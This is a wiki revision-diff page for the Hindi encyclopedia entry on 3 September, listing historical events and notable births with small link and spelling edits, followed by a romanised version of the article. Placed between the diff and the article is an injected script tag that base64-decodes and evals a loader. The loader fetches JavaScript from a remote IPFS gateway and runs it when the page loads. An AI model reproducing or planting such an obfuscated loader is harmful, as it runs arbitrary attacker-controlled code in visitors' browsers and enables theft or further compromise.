Difference between revisions of "3 सितंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by the same user not shown)
Line 4: Line 4:
  
 
==3 सितंबर की महत्त्वपूर्ण घटनाएँ==
 
==3 सितंबर की महत्त्वपूर्ण घटनाएँ==
* 1783 - [[अमेरिका]] और [[ब्रिटेन]] के बीच पेरिस की संधि के साथ क्रांतिकारी युद्ध समाप्त हो गया।
+
* [[1783]] - [[अमेरिका]] और [[ब्रिटेन]] के बीच पेरिस की संधि के साथ क्रांतिकारी युद्ध समाप्त हो गया।
* 1833 - [[अमेरिका]] में पहली सफल [[समाचार पत्र]] ‘न्यूयार्क सन’ बेंजामिन एच डे के द्वारा शुरू किया गया था।
+
* [[1833]] - [[अमेरिका]] में पहला सफल [[समाचार पत्र]] ‘न्यूयार्क सन’ बेंजामिन एच डे के द्वारा शुरू किया गया था।
* [[1939]] - ब्रिटिश प्रधानमंत्री नेविले चेम्बरलिन द्वारा एक रेडियो प्रसारण पर [[ब्रिटेन]] और [[फ्रांस]] का [[जर्मनी]] के खिलाफ युद्ध की घोषणा करने के साथ ही द्वितीय विश्व युद्ध शुरु हुआ।
+
* [[1939]] - ब्रिटिश प्रधानमंत्री नेविले चेम्बरलिन द्वारा एक रेडियो प्रसारण पर [[ब्रिटेन]] और [[फ्रांस]] का [[जर्मनी]] के खिलाफ युद्ध की घोषणा करने के साथ ही द्वितीय विश्व युद्ध शुरू हुआ।
 
* [[1943]] - दूसरे विश्व युद्ध के दौरान मित्र राष्ट्रों ने [[इटली]] पर हमला किया।
 
* [[1943]] - दूसरे विश्व युद्ध के दौरान मित्र राष्ट्रों ने [[इटली]] पर हमला किया।
 
* [[1971]] - कतर स्वतंत्र राष्ट्र बना।
 
* [[1971]] - कतर स्वतंत्र राष्ट्र बना।
 
* [[1984]]- [[ फिलिपीन्स|दक्षिण फिलिपीन्स]] में आये एक भयानक [[तूफान]] की वजह से करीब 1300 मारे गए और सैकड़ों घायल हुए।
 
* [[1984]]- [[ फिलिपीन्स|दक्षिण फिलिपीन्स]] में आये एक भयानक [[तूफान]] की वजह से करीब 1300 मारे गए और सैकड़ों घायल हुए।
* [[1998]] - [[नेल्सन मंडेला]] द्वारा गुट निरपेक्ष आंदोलन शिखर सम्मेलन में [[कश्मीर]] का मुद्दा उठाये जाने पर प्रधानमंत्री [[वाजपेयी]] ने कड़ी आपत्ति व्यक्त की।
+
* [[1998]] - [[नेल्सन मंडेला]] द्वारा गुट निरपेक्ष आंदोलन शिखर सम्मेलन में [[कश्मीर]] का मुद्दा उठाये जाने पर [[प्रधानमंत्री]] [[अटलबिहारी वाजपेयी]] ने कड़ी आपत्ति व्यक्त की।
मुक्त कराने की इस कार्रवाई में कम से कम 200 लोग मारे गए थे जिनमे ज्‍यादातर स्कूली बच्चे थे।
 
 
* [[2003]] - [[पाकिस्तान]] सरकार द्वारा पूर्व प्रधानमंत्री बेनजीर भुट्टो पर देशद्रोह का मुकदमा चलाने का निर्णय।  
 
* [[2003]] - [[पाकिस्तान]] सरकार द्वारा पूर्व प्रधानमंत्री बेनजीर भुट्टो पर देशद्रोह का मुकदमा चलाने का निर्णय।  
 
* [[2004]] - रुसी सैनिकों ने अपहरणकर्ताओं के कब्‍जे से स्कूल मुक्त कराया।
 
* [[2004]] - रुसी सैनिकों ने अपहरणकर्ताओं के कब्‍जे से स्कूल मुक्त कराया।
Line 17: Line 16:
 
* [[2007]] - [[चीन]] के झिंगजियांग प्रान्त में चीनी व [[जर्मनी|जर्मन]] विशेषज्ञों ने लगभग 16 करोड़ साल पुराने जीव के 17 दांत खोजने का दावा किया। [[बांग्लादेश]] की पूर्व प्रधानमंत्री ख़ालिदा जिया और उनके सबसे छोटे पुत्र अराफ़ात रहमान कोको को भ्रष्टाचार के आरोप में गिरफ़्तार किया गया।
 
* [[2007]] - [[चीन]] के झिंगजियांग प्रान्त में चीनी व [[जर्मनी|जर्मन]] विशेषज्ञों ने लगभग 16 करोड़ साल पुराने जीव के 17 दांत खोजने का दावा किया। [[बांग्लादेश]] की पूर्व प्रधानमंत्री ख़ालिदा जिया और उनके सबसे छोटे पुत्र अराफ़ात रहमान कोको को भ्रष्टाचार के आरोप में गिरफ़्तार किया गया।
 
* [[2008]] - [[राजेन्द्र कुमार पचौरी]] को [[संयुक्त राष्ट्र]] की संस्था जलवायु परिवर्तन के अन्तर सरकारी पैनल (आईपीसीसी) का पुनः प्रमुख चुना गया।
 
* [[2008]] - [[राजेन्द्र कुमार पचौरी]] को [[संयुक्त राष्ट्र]] की संस्था जलवायु परिवर्तन के अन्तर सरकारी पैनल (आईपीसीसी) का पुनः प्रमुख चुना गया।
* [[2009]] - [[आंध्र प्रदेश]] के मुख्यमंत्री वाई. एस. रेड्डी की हेलीकाप्टर दुर्घटना में मौत हो गयी।
+
* [[2009]] - [[आंध्र प्रदेश]] के [[मुख्यमंत्री]] वाई. एस. रेड्डी की हेलीकाप्टर दुर्घटना में मौत हो गयी।
* [[2014]] - [[भारत]] और [[पाकिस्तान]] में अचानक अायी [[बाढ़]] के कारण दो सौ से ज्यादा लोगों की मौत।
+
* [[2014]] - [[भारत]] और [[पाकिस्तान]] में अचानक आयी [[बाढ़]] के कारण दो सौ से ज्यादा लोगों की मौत।
  
 
==3 सितंबर को जन्मे व्यक्ति==
 
==3 सितंबर को जन्मे व्यक्ति==
Line 25: Line 24:
 
* [[1923]] - [[किशन महाराज]]- सुप्रसिद्ध [[तबला]] वादक।
 
* [[1923]] - [[किशन महाराज]]- सुप्रसिद्ध [[तबला]] वादक।
 
* [[1926]] - [[उत्तम कुमार]] -  [[सिनेमा|भारतीय सिनेमा]] में [[हिन्दी]] और [[बांग्ला भाषा|बांग्ला]] फ़िल्मों के प्रसिद्ध अभिनेता।
 
* [[1926]] - [[उत्तम कुमार]] -  [[सिनेमा|भारतीय सिनेमा]] में [[हिन्दी]] और [[बांग्ला भाषा|बांग्ला]] फ़िल्मों के प्रसिद्ध अभिनेता।
 +
* [[1931]] - [[सी. पी. ठाकुर]] - प्रख्यात चिकित्सक, एक सफल राजनीतिज्ञ, भूतपूर्व केंद्रीय मंत्री तथा भूतपूर्व राज्य सभा सांसद हैं।
 
* [[1957]] - [[जग्गी वासुदेव]] - विश्व प्रसिद्ध रहस्यवादी और भारतीय मूल के योगी हैं।
 
* [[1957]] - [[जग्गी वासुदेव]] - विश्व प्रसिद्ध रहस्यवादी और भारतीय मूल के योगी हैं।
 
* [[1940]] - [[प्यारेलाल]] -  [[हिंदी सिनेमा]] की प्रसिद्ध संगीतकार जोड़ी [[लक्ष्मीकांत]]-प्यारेलाल में से एक।
 
* [[1940]] - [[प्यारेलाल]] -  [[हिंदी सिनेमा]] की प्रसिद्ध संगीतकार जोड़ी [[लक्ष्मीकांत]]-प्यारेलाल में से एक।

Latest revision as of 08:45, 10 February 2024

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 3 sitanbar varsh ka 246 vaan (lip varsh mean yah 247 vaan) din hai. sal mean abhi aur 119 din shesh haian.

3 sitanbar ki mahattvapoorn ghatanaean

  • 1783 - amerika aur briten ke bich peris ki sandhi ke sath kraantikari yuddh samapt ho gaya.
  • 1833 - amerika mean pahala saphal samachar patr ‘nyooyark san’ beanjamin ech de ke dvara shuroo kiya gaya tha.
  • 1939 - british pradhanamantri nevile chembaralin dvara ek rediyo prasaran par briten aur phraans ka jarmani ke khilaph yuddh ki ghoshana karane ke sath hi dvitiy vishv yuddh shuroo hua.
  • 1943 - doosare vishv yuddh ke dauran mitr rashtroan ne itali par hamala kiya.
  • 1971 - katar svatantr rashtr bana.
  • 1984- dakshin philipins mean aye ek bhayanak toophan ki vajah se karib 1300 mare ge aur saik doan ghayal hue.
  • 1998 - nelsan mandela dvara gut nirapeksh aandolan shikhar sammelan mean kashmir ka mudda uthaye jane par pradhanamantri atalabihari vajapeyi ne k di apatti vyakt ki.
  • 2003 - pakistan sarakar dvara poorv pradhanamantri benajir bhutto par deshadroh ka mukadama chalane ka nirnay.
  • 2004 - rusi sainikoan ne apaharanakartaoan ke kabh‍je se skool mukt karaya.
  • 2006 - yoorop ka pahala trivarshiy chandr mishan samapt. bharatiy mool ke bharat jagadev ne guyana ke rashtrapati ke roop mean shapath li.
  • 2007 - chin ke jhiangajiyaang prant mean chini v jarman visheshajnoan ne lagabhag 16 karo d sal purane jiv ke 17 daant khojane ka dava kiya. baangladesh ki poorv pradhanamantri khalida jiya aur unake sabase chhote putr arafat rahaman koko ko bhrashtachar ke arop mean giraftar kiya gaya.
  • 2008 - rajendr kumar pachauri ko sanyukt rashtr ki sanstha jalavayu parivartan ke antar sarakari painal (aeepisisi) ka punah pramukh chuna gaya.
  • 2009 - aandhr pradesh ke mukhyamantri vaee. es. reddi ki helikaptar durghatana mean maut ho gayi.
  • 2014 - bharat aur pakistan mean achanak ayi badh ke karan do sau se jyada logoan ki maut.

3 sitanbar ko janme vyakti

3 sitanbar ko hue nidhan

3 sitanbar ke mahattvapoorn avasar evan utsav

  • rashtriy poshahar divas (saptah)

bahari k diyaan

univarta.com


sanbandhit lekh